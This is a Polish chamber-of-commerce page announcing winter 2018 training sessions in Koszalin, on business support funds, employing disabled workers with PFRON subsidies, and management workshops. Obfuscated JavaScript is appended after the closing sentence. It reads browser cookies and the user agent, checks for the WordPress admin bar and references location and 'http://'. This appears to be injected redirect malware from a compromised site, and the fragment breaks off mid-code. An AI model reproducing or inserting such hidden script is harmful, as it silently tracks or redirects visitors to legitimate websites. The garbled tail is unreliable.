Szkolenia w PIG – Zima 2018 | Północna Izba Gospodarcza w Koszalinie

Polnocna-Izba-Koszalin-szkolenia-zima

30.01 Formy wsparcia dla przedsiębiorców

Miejsce: Restauracja Maredo, ul.Zwycięstwa 45, Koszalin
Godzina  12:00, czas trwania 3 godziny

Na spotkaniu zostaną przedstawione informacje na temat:

  • Nowe przepisy w zatrudnianiu cudzoziemców – zmiany 2018
  • Krajowy Fundusz Szkoleniowy realizacja na rok 2018
  • Formy wsparcia dla przedsiębiorców z Urzędu Pracy
  • Dofinansowania do usług szkoleniowych z Koszalińskiej Agencji Rozwoju Regionalnego
  • Pożyczki dla firm w naszym regionie

Szkolenie poprowadzą przedstawiciele Powiatowego Urzędu Pracy w Koszalinie oraz pracownicy Koszalińskiej Agencji Rozwoju Regionalnego.

21.02 Zatrudnianie osób niepełnosprawnych (prawa, obowiązki, „przywileje”)

Miejsce: Restauracja Maredo, ul.Zwycięstwa 45, Koszalin
Godzina  12:00, czas trwania 1,5 godziny

Szkolenie przeprowadzą przedstawiciele LEGIS KANCELARIA ze Szczecina.

Zatrudnienie niepełnosprawnego pracownika – dofinansowanie do wynagrodzenia

Pracodawcy, który zatrudnia osoby niepełnosprawne, przysługuje ze środków Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych miesięczne dofinansowanie do wynagrodzeń pracowników niepełnosprawnych, o ile pracownicy ci znajdują się w ewidencji zatrudnionych osób niepełnosprawnych, prowadzonej przez PFRON.

Dofinansowanie przysługuje: każdemu pracodawcy zatrudniającemu osobę niepełnosprawną,

pracodawcy prowadzącemu zakład pracy chronionej, pracodawcy zatrudniającemu co najmniej 25 pracowników w przeliczeniu na pełny wymiar czasu pracy i osiągającemu wskaźnik zatrudnienia osób niepełnosprawnych w wysokości co najmniej 6 % pracodawcom, którzy nie posiadają zaległości w zobowiązaniach wobec Funduszu.

Więcej informacji wkrótce.

 

7.03 Kierowanie zespołem (jak znaleźć i utrzymać pracownika) – warsztaty

21.03 Zarządzanie czasem organizacja pracy w przedsiębiorstwie – warsztaty

Potwierdzenia obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie pod numer 537 184 630.

Jeżeli podane godziny szkoleń Państwu nie odpowiadają, bardzo prosimy o informację. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m